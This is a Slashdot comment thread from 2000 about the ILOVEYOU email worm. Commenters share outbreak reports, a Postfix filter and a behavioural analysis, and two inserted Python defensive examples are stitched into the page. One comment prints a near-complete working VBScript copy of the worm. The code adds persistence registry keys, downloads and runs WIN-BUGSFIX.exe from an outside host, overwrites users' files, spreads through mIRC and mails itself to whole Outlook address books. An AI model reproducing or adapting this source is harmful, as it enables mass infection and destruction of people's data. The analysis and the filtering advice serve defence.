
I Love You "Virus" Hates Everyone

CmdrTaco posted more than 14 years ago | from the just-when-the-last-rash-cleared-up dept.

Spam 519

Loquis was the first of seven billion readers to submit this story about the I Love You Virus and the UK. It's not really a virus: it's a trojan that proclaims its love for the recipient and requests that you open its attachment. On a first date even! It then loves you so much that it sends copies of itself to everyone in your addressbook (slut!) and starts destroying files on your drive. Course they estimate that it's infected 10% of the UK. Pine/Elm/Mutt users as always laugh maniacally as the trojan shuffles countless wasted packets over saturated backbones filling overworked SMTP servers everywhere. Sysadmins are seen weeping in the alleys. Update: 05/04 03:12 by CT : My Roommate Kurt "The Pope" DeMaagd has written a better summary of the trojan and more importantly a HOWTO fix it. Windows users only ;) Requires registry hacking, so it's not for everyone.

519 comments

What's love got to do with it? (1)

sensate_mass (171138) | more than 14 years ago | (#1092555)

We've got to come up with another venue for the kiddies to get their fame. Maybe we can bring back graffiti.

Looks a bit like Melisa (1)

davetza (117689) | more than 14 years ago | (#1092556)

From reports that are coming in it looks like it started somewhere in Asia and then moved into Europe. A lot of ISPs in South Africa have also been badly affected

OPening e-mail attachments (1)

waldeaux (109942) | more than 14 years ago | (#1092557)

OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

This hit where I work. (4)

Shadowlion (18254) | more than 14 years ago | (#1092558)

I have Outlook 2000 open as we speak.

So far, I've received (estimated) about fifty copies of the damn thing. It's funny, in a "well, hey, look - a train wreck" sort of way.

First Post - without email here (1)

nospoon (126741) | more than 14 years ago | (#1092559)

The email Servers where I work have been shut down due to this nasty bugger. It came in over our WAN from Germany and the UK sometime around 3AM.

Guess it will be a quiet day today!

Mixed emotions... (1)

Rob Kaper (5960) | more than 14 years ago | (#1092560)

ILOVEYOU?!?!

They would be better off calling these viruses "Mixed emotions".. perhaps our Linux team thought it was funny, but our NT team did not. ;-)

This amused everyone in my office (1)

frog51 (51816) | more than 14 years ago | (#1092561)

We thought it was weird, but it wouldn't run on most of my colleagues' machines anyway - so I opened it using a text editor, and it's written in plain, unobfuscated text.
Lines like spread(email) are kinda obvious.

Still, the first guy who got it was distraught that she didn't love him after all:)

Dunno about the virus... (4)

BrianW (180468) | more than 14 years ago | (#1092562)

But the number of "If you get an email that says 'I love you', DON'T OPEN IT!" messages is getting a bit annoying.

Well, it is in the US already. (1)

fransdw (17996) | more than 14 years ago | (#1092563)

It is already in FL and making its way through the government address books which are not small by any measure.

They need to implement the Chinese solution... (1)

Rombuu (22914) | more than 14 years ago | (#1092564)

...for this sort of thing, if you know what I mean...

Weaping? (1)

howly (96368) | more than 14 years ago | (#1092565)

What's this "Weaping" business? Is it some sort of Elmer Fudd-ism? It's WEEPING. Buy a spell checker.

Thank you for your innovation, Microsoft! (1)

korpiq (8532) | more than 14 years ago | (#1092566)


This is /just/ so crappy. You know, before 1995 every time someone forwarded you a warning of this-and-that e-mail virus, you'd respond by "Viruses don't spread by e-mail."

What the heck do I care, but it pisses me off to see that some people even at my work place can be disturbed by this. Internally we're an AIX house, for God's sake!

Clean up (4)

xianzombie (123633) | more than 14 years ago | (#1092567)

As far as I know, the virus started out in Asia (somewhere) and made its way to Europe and now the US (including many military installations as well).

Sites I've found that offer disinfectants are a post on ZDNet http://www.zdnet.com/tlkbck/comment/22/0,7056,88754-421758,00.html, as well as http://www.f-source.com

good luck people

Not just the UK, Indiana is getting hammered, too. (1)

Frederick Paepke (6705) | more than 14 years ago | (#1092568)

It's not just the UK that's getting hit hard. Things here in northern Indiana are very ugly this morning.

Re:This hit where I work. (2)

Shadowlion (18254) | more than 14 years ago | (#1092569)

On the other hand, I'm personally not stupid enough to open an attachment like this (especially with the obvious tagline of "LOVE-LETTER-FOR-YOU.TXT.vbs" - gee, you think that's a Visual Basic script?).

I should really be compiling a list of the coworkers I'm receiving this from. It always pays to know where stupidity is in the org chart.

Netscape Messenger (1)

kperrier (115199) | more than 14 years ago | (#1092570)

Hey! Those of us who use messenger are not immune to this as well. I have received about 10 copies of it this morning.. And the IT folks want to know why I don't want to use Outlook......

Maybe this can get companies to consider UNIX? (3)

jaf (121858) | more than 14 years ago | (#1092571)

Our company was just hit by this - one NT server and two workstations down.. it deletes and renames files like there's no tomorrow.

UNIX would not have a problem here..

Maybe in the long run though - but at least a virus would "only" be able to do what the user can do - not nuke the system.

People still have to be dumb enough to open the attachment.

I got it..... (3)

peterdaly (123554) | more than 14 years ago | (#1092572)

The nice thing about viruses like this is you find out about people you never met who have you in their address book....at least in my case. -Pete

Showed up here, too! (1)

Bob McCown (8411) | more than 14 years ago | (#1092573)


We've got a copy of it here, but it was caught by an on-the-ball employee that received it, and forwarded it to the IT department...

windoze only!!!! (1)

gerti (22279) | more than 14 years ago | (#1092574)

At the lab I'm working as a system administrator, we're jumping with joy as we see the number of companies that suffer from this virus grow. We're using iMacs, OS X server Macs, and suns running Solaris boxes, and everything is perfectly all right here :-))

Re:Looks a bit like Melisa (4)

deasmi (97040) | more than 14 years ago | (#1092575)

The first two lines of the script are quite amusing.
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
I do hope that's not his real address....

Bad Worm. (1)

trexl (16434) | more than 14 years ago | (#1092576)

What a treat. Is it just me or are viruses that affect e-mail seen as so much scarier since the user gets to see something, as opposed to other viruses that do damage and don't announce themselves.

Anyway, I read this over on OSOpinion [osopinion.com] ... but could MS's implanting of Outlook in nearly everything actually be more damaging than their inclusion of IE in DOS?

Total Cost of ownership if Outlook/Exchange (5)

smartin (942) | more than 14 years ago | (#1092577)

This is the second time in a couple of months that I've been at a company where this sort of thing has gone around and around. Companies really need to be aware of the consequences of using Outlook and Exchange. This does not happen when you are using Sendmail and a regular POP3 or IMAP client.

Well Damn (2)

zpengo (99887) | more than 14 years ago | (#1092578)

Now I have to tell my girlfriend to delete all my old e-mails, because they had that subject line, and you never know!

Re:OPening e-mail attachments (5)

akey (29718) | more than 14 years ago | (#1092579)

OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

Personally, I loved the quote from the journalist who said that she was suspicious when she received 5 copies of it, but since the last one was from Dow Jones, she opened it anyway... :-)

---

Re:OPening e-mail attachments (1)

MarkKomus (71304) | more than 14 years ago | (#1092580)

Some users still get confused if the default username in the login box gets changed. We have a ways to go before they'll learn about e-mail attachments.

Solution for Postfix (5)

njr (115982) | more than 14 years ago | (#1092581)

If not active in /etc/postfix/main.cf uncomment the line and change it to a line similar to:

header_checks = regexp:/etc/postfix/header_checks

Add the following line in /etc/postfix/header_checks:

/^Subject: ILOVEYOU/ REJECT

This will reject mails containing this subject.

Thanks to Claus Guttesen who posted this on the postfix mailing list.
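
An added example, not part of the post above and not Postfix code: the subject rule from that post applied to four constructed messages, next to a check on the attachment's file name. The extension list, the addresses and the sample subjects are assumptions made for illustration.

```python
import re
from email import message_from_string

# The rule from the post, written as a Python regex.
SUBJECT_RULE = re.compile(r"^Subject: ILOVEYOU")
# Assumption: script extensions to refuse, taken from file types named in this thread.
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".wsh", ".sct", ".hta")


def make_message(subject, filename=None):
    """Build a constructed sample message; filename=None means no attachment."""
    lines = [
        "From: colleague@example.com",
        "To: you@example.com",
        f"Subject: {subject}",
        "MIME-Version: 1.0",
        'Content-Type: multipart/mixed; boundary="b1"',
        "",
        "--b1",
        "Content-Type: text/plain",
        "",
        "see attached",
    ]
    if filename:
        lines += [
            "--b1",
            "Content-Type: application/octet-stream",
            f'Content-Disposition: attachment; filename="{filename}"',
            "",
            "(constructed placeholder, no real content)",
        ]
    lines.append("--b1--")
    return "\n".join(lines) + "\n"


def subject_check(raw):
    """Verdict of the subject-line rule alone."""
    msg = message_from_string(raw)
    header = "Subject: " + (msg["Subject"] or "")
    return "REJECT" if SUBJECT_RULE.search(header) else "OK"


def attachment_check(raw):
    """Verdict based on the file name of every MIME part."""
    msg = message_from_string(raw)
    for part in msg.walk():
        name = part.get_filename()
        if name and name.lower().endswith(SCRIPT_EXTS):
            return "REJECT"
    return "OK"


def verdicts(raw):
    return (subject_check(raw), attachment_check(raw))


# Constructed samples: the mail as described in the thread, the same
# attachment under another subject, a harmless mail that happens to use
# the subject, and ordinary mail.
SAMPLES = {
    "worm as described": make_message("ILOVEYOU", "LOVE-LETTER-FOR-YOU.TXT.vbs"),
    "same attachment, other subject": make_message("Re: lunch?", "LOVE-LETTER-FOR-YOU.TXT.vbs"),
    "harmless mail, same subject": make_message("ILOVEYOU"),
    "ordinary mail": make_message("Quarterly report", "report.txt"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        subj, att = verdicts(raw)
        print(f"{label:32} subject rule: {subj:7} attachment rule: {att}")
```

The two checks disagree on the middle two samples: the subject rule passes a renamed copy and refuses a harmless mail, while the file-name check does the opposite.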

Source at ftp://weazel.student.utwente.nl/pub/ (2)

Anonymous Coward | more than 14 years ago | (#1092582)

It's a very nasty trojan, especially because it starts automatically after a reboot. To be sure what it does and doesn't, look at: ftp://weazel.student.utwente.nl/pub/mailworm.txt

Blasted thing... (1)

thenerd (3254) | more than 14 years ago | (#1092583)

Things have been fairly cool here (r&d for telecoms). They reckon it came from the Philippines, for some reason.

I got it without an attachment, and emailed the woman back 'I'm mortified that you didn't include the letter'.

I'm not sure whether I feel like an idiot or what!

thenerd.

Fast spread, but better handled? (2)

redelm (54142) | more than 14 years ago | (#1092584)

I never saw Melissa, but I did get three copies of ILOVEYOU thanks to the corporate-wide mailing list. That was this morning. Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.

This really is a problem.. (1)

MonkeyMagic (118319) | more than 14 years ago | (#1092585)

..as it is sooo easy to access the windows address book and Exchange from a program without even needing a password. I'm not sure how this one worked as our mail has been shut down and therefore I can't get a copy, but for there to be no need for permissions (at least, this is the case on NT) is ridiculous.

Re:What's love got to do with it? (1)

SEWilco (27983) | more than 14 years ago | (#1092586)

But this is graffiti, for the lazy. It spreads itself around.

Too many email users are ignorant as piss. (1)

unquiet (64767) | more than 14 years ago | (#1092587)

Sometimes they get what they deserve by opening executables. Sometimes others get what the ignoramus deserves, when it's doing the address book lookup. Education about using email [unquietmind.com] is the answer. Too bad it's not 100% effective.

Analysis (1)

Anonymous Coward | more than 14 years ago | (#1092588)

This analysis I did this morning in a rush when one of our HR girls ran it. It's a VBS worm. It spreads by two methods, irc and email. On startup it sets the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout to 0 It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs WINNT/Win32DLL.vbs WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT It then creates registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL which will run the script again on the next boot of the computer Next it checks to see if ie download directory is set in the registry - if it is it remembers that value, otherwise it uses c:\ instead. It then checks to see if /WINNT/SYSTEM32/WInFAT32.exe exists - if it does it sets internet explorers start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net It then checks to see if this file has been downloaded (i.e. when the script is run at a later date). If it has, it sets this .exe to be run at next boot and resets i.e home page to about:blank (blank page) Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM This basically contains the worm itself set to run when the page is viewed. Now it does the old trick of opening the Outlook address book, grabbing *all* the entries in it and emailing them an email with the subject line "ILOVEYOU" and the worm as an attachment.
Now it has a look around all the drives on the machine (local drives I think) and does the following a) If it finds mirc, edits its ini file so when you next log onto an irc channel it dcc's itself to all the other users b) Overwrites any .vbs and .vbe files it finds with itself c) If it finds any vbs, vbe, css, wsh, sct or hta files it deletes them, creates a new file with the same name ending in vbs and copies itself to it d) Does similar things to (c) to .mp3, .mp2, .jpg, .jpeg Then the script ends Stuart

That's Funny... (1)

Gorth (35695) | more than 14 years ago | (#1092589)

I wake up this morning, check /. as usual and see this story. About 5mins after seeing the story and chuckling to myself about the entire idea of virii, guess what appeared in my inbox.. Yup A copy of this trojan for my very own ;)

Re:Dang! (1)

aclute (94263) | more than 14 years ago | (#1092590)

That's ok! Reading the email is ok, it is running the attachment that is bad! You didn't do anything

Democracy wiped out by killer trojan (1)

pyrotic (169450) | more than 14 years ago | (#1092591)

Poor old House of Commons. Seems our beloved democracy has been brought to its knees by this one.

Pretty Nasty actually (5)

scrutty (24640) | more than 14 years ago | (#1092592)

We got hit in our office this morning. Obviously the techs like me were running Linux and laughed it off. But unlike Melissa this one actually carries a nasty payload.

It mails to everyone in your Outlook addressbook, not just 50. Also your MIRC nick list. It trawls all your mounted directories copying itself over all MP3's JPEGS .jpgs, style sheets and .js files amongst others

This actually managed to knock out half of our office , as well as render one of our live web servers pretty messed up , within under 10 minutes of the first person activating it. Yes, the webserver was a linux box, but one unfortunate had a subtree on a server that mirrored stuff to it mounted over a samba share

And no, you didn't have to click on it. That damn preview pane was enough to trigger it off.

Re:This hit where I work. (1)

d-e-w (173678) | more than 14 years ago | (#1092593)

Yup - hit my computer about 8:30AM CDT. I noticed it because 1. the guy that "sent" the damn thing definitely wouldn't be sending a "love letter" to me ;) and that 2. I used to share an email address with another person in the office and so received two copies.

Grabbed the server guy when he walked in a couple of minutes later and forced him to get a block enabled. We're behind a 166 DSL line and don't need that crap clogging it up for the rest of the day.

BTW, I'm US-based. We're international and work a lot with people from the UK, which is probably where it came in from, but the first guy who received it here probably spread it near and far across the US. :( His address book probably has hundreds of people and I don't see any mention of this having a max. So it's come to the US.

D'oh ! (1)

Camelot (17116) | more than 14 years ago | (#1092594)

Personally, I loved the quote from the journalist who said that she was suspicious when she received 5 copies of it, but since the last one was from Dow Jones, she opened it anyway... :-)

Would you like to date a guy who is called "Dow" ? D'oh, I'll say.

Just some info... (1)

IainMH (176964) | more than 14 years ago | (#1092595)

I also got voicemails as well as half a meg of 'don't open it e-mails' To remove this email from Netscape : From the View menu go to show and make sure there is not a tick next to the message option. If there is a tick select message. Once done the message window should disappear. You can highlight the email to delete it. Do not double click on it otherwise it will open the email. Once deleted you will need to empty your trash. To remove from Outlook : From the view menu deselect "Preview Pane" so that you can't see what the contents of the message is. Then delete the mail. You will need to empty your trash too. If anyone is interested, I got mail the script...

E-mail too versatile? (2)

zpengo (99887) | more than 14 years ago | (#1092596)

Perhaps we should go back to the days of simple e-mail clients, that would make a virus like this look around, get confused, and then fall over.

Either that, or people need to stop using the address books, which are for lusers anyway! :o)

It's hitting all over Europe. (2)

Noryungi (70322) | more than 14 years ago | (#1092597)


My job's sysadmin has already warned us that the virus was in the wild somewhere, and has asked us *not* to open anything suspicious.

I know that several large firms in my area are also scrambling to stop the infection. This virus can stop any MS system dead in its tracks and clog the others beyond repair. Tough little one!

The Netherlands are being hit hard too (1)

Bardad (19676) | more than 14 years ago | (#1092598)

Dutch news has that some 10% of bigger companies have shut down their email systems as a result of the "I LOVE YOU" virus already. It is on the radio news right now, as the first item.

If you have a chance, take a look at the virus code, and see what some 300 lines of visual basic can cost industry in say a 24 hour period.

In fact, as I write this, a guy from our support department comes in and hands me a printed "Virus Alert" piece of paper! It says the virus sends itself to all addresses in your address book. Having looked at the code, the virus also checks if you run an IRC client, and sends itself to everyone in all channels you are in.

The virus also changes all .MP2 .MP3 .CSS .HTML and .JPG files, and renames them to .VBS files!

Hmmm... there seems to be some really bored kid out there somewhere... the first line of the virus script reads:
rem barok -loveletter(vbe)

Ron Sprenkels (sprenkel@cs.utwente.nl)

Outlook Strikes Again. (2)

nard (165611) | more than 14 years ago | (#1092599)

From my initial investigation it looks like it is totally MS Specific. So own up then how many /. readers have been kicked in the balls? Come out of the closet all of you!

LINUX (1)

gordzilla (97994) | more than 14 years ago | (#1092600)

I LOVE YOU (sorry, couldn't resist)

Next step: AutoEducation.exe (3)

FascDot Killed My Pr (24021) | more than 14 years ago | (#1092601)

This virus follows the same pattern of "send to everyone in the address book", but ALSO appends the senders name to a data file included with the virus.

The recipient then falls into one of three classes:

1) Can't get/read virus.
2) Can get/read virus and gets stung (and appended to list).
3) Can get/read virus, doesn't get stung, received handy list of idiot coworkers.

This list can be used in a multitude of ways:

1) Reduce headcount
2) List of gullible fools who will buy $2 candy bars "to send the Girl Scouts to the Moon"
3) Identify users who need "training" (sit in a small hot room with each other and an instructor who does nothing but taunt them for their hunt-n-pecking)

--
Have Exchange users? Want to run Linux? Can't afford OpenMail?

*sob* (3)

Raymond Luxury Yacht (112037) | more than 14 years ago | (#1092602)

The only love letter I've ever gotten... and I can't open it....

Re:Analysis (5)

Anonymous Coward | more than 14 years ago | (#1092603)

Sorry - lost the /n's there

It's a VBS worm. It spreads by two methods, irc and email.

On startup it sets the registry key
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
to 0

It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs
WINNT/Win32DLL.vbs
WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT

It then creates registry keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL

which will run the script again on the next boot of the computer

Next it checks to see if ie download directory is set in the registry
- if it is it remembers that value, otherwise it uses c:\ instead.

It then checks to see if /WINNT/SYSTEM32/WInFAT32.exe exists - if it does
it sets internet explorers start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net

It then checks to see if this file has been downloaded (i.e. when the script is run at a later date). If it has, it sets this .exe to be run at next boot and resets i.e home page to about:blank (blank page)

Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM
This basically contains the worm itself set to run when the page is
viewed.

Now it does the old trick of opening the Outlook address book, grabbing
*all* the entries in it and emailing them an email with the subject line "ILOVEYOU" and the worm as an attachment.

Now it has a look around all the drives on the machine (local drives I think) and does the following
a) If it finds mirc, edits its ini file so when you next log onto an
irc channel it dcc's itself to all the other users
b) Overwrites any .vbs and .vbe files it finds with itself
c) If it finds any vbs, vbe, css, wsh, sct or hta files it deletes them,
creates a new file with the same name ending in vbs and copies itself to
it
d) Does similar things to (c) to .mp3, .mp2, .jpg, .jpeg

Then the script ends

Stuart
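
An added example, not part of the analysis above: a read-only scan of a directory tree for the file artifacts that analysis lists, using the marker line quoted elsewhere in this thread. The reason labels, the sample tree and the `name.ext.vbs` pattern for replaced media files are assumptions made for illustration; the registry keys are not checked here.

```python
import os
import tempfile

# First line of the script as quoted in this thread.
MARKER = b"rem barok -loveletter(vbe)"
# File names the thread reports the worm dropping or downloading.
DROPPED_NAMES = {
    "mskernel32.vbs",
    "win32dll.vbs",
    "love-letter-for-you.txt.vbs",
    "love-letter-for-you.htm",
    "win-bugsfix.exe",
}
SCRIPT_EXTS = {".vbs", ".vbe"}
# Assumption: a copy that replaced a media file keeps the old name and
# gains a .vbs suffix, e.g. song.mp3.vbs.
MEDIA_EXTS = {".jpg", ".jpeg", ".mp3", ".mp2"}


def starts_with_marker(path):
    """True if the file begins with the worm's first comment line."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(256)
    except OSError:
        return False  # unreadable files are skipped, not reported
    return head.lstrip().lower().startswith(MARKER)


def classify(path):
    """Return a reason string for a suspicious file, or None."""
    name = os.path.basename(path).lower()
    stem, ext = os.path.splitext(name)
    if name in DROPPED_NAMES:
        return "dropped-copy"
    if ext in SCRIPT_EXTS and starts_with_marker(path):
        if os.path.splitext(stem)[1] in MEDIA_EXTS:
            return "replaced-media"
        return "overwritten-script"
    return None


def scan(root):
    """Walk root and return sorted (relative path, reason) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            reason = classify(full)
            if reason:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, reason))
    return sorted(findings)


def build_sample_tree(root):
    """Create constructed stand-in files; none contains worm code."""
    infected = MARKER + b"\r\n' constructed stand-in\r\n"
    samples = {
        "system32/MSKernel32.vbs": infected,
        "system32/LOVE-LETTER-FOR-YOU.HTM": b"<html>constructed stand-in</html>",
        "docs/backup.vbs": infected,
        "docs/login.vbs": b'WScript.Echo "hello"\r\n',
        "music/song.mp3.vbs": infected,
        "music/other.mp3": b"constructed audio stand-in",
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo():
    """Scan a temporary constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:20} {rel}")
```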

Re:Pretty Nasty actually (1)

xianzombie (123633) | more than 14 years ago | (#1092604)

On the contrary, I use the preview pane and it was not triggered on my system...

...or maybe they took the mail server down prior to me noticing it being on my system....that would suck....

Re:Maybe this can get companies to consider UNIX? (1)

Smallest (26153) | more than 14 years ago | (#1092605)

UNIX would not have a problem here..

Windows is not the problem - Outlook is. If SendMail was as wide open as Outlook is, UNIX would have the same problem.

Re:Just some info... (1)

IainMH (176964) | more than 14 years ago | (#1092606)

Bugger - should have used the preview....

Just wanted Plain Old Text..

sorry :-~

Someone please explain.. (1)

Rob Kaper (5960) | more than 14 years ago | (#1092607)

Fortunately, our office is not affected yet, one of our clients warned us in time - not by e-mail I presume.

What worries me, and I like to have this explained, is why people continue to use Outlook.

First it was Melissa, now it is ILOVEYOU.. you would think that someone would wake up and do something constructive such as switching to a mail program that would and could not be affected.

I've tried to reason with our NT users, telling them that we got away these two times but that the next time (because there will be a next time I'm afraid) we might not be so lucky. Are there any worthy alternatives to Outlook? [worthy enough to convince the NT group.. you know how stubborn they are.. they're almost zealots like us ;-)]

Re:Total Cost of ownership if Outlook/Exchange (2)

sTeF (8952) | more than 14 years ago | (#1092608)

it's indifferent, if you use sendmail or exchange it depends on the os, if your os is capable of running vb crap, and your e-mail client is configured to run it, then you suffer, i can imagine pine running on windows, with a mailcap entry for vbs files... but most nobody is that stupid.

Outlook Exchange Web Server (1)

Glytch (4881) | more than 14 years ago | (#1092609)

My college email comes through an Outlook web server (right here, if you're interested [nbcc.nb.ca] ) and I'm wondering if I've got anything to worry about. I've tried to get the bloody admins to allow POP email clients to work with the college's system, but the morons don't know how to do it.

Outlook web admins, should I be worried at all?

Worm love? (1)

jaf (121858) | more than 14 years ago | (#1092610)

Maybe in a few weeks, we will have a different worm (a small variation) saying "ILOVEYOUTOO" :)

Here is the Visual Basic Script that is "ILOVEYOU" (5)

GC (19160) | more than 14 years ago | (#1092611)

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micr osoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32",dirsystem&"\ MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Win32DLL",dirwin &"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micr osoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhj kxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7 679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRp Gqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbv g/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPh jasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg /WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFIX",downread&"\ WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software \Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Softwar e\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR -YOU.TXT.vbs")
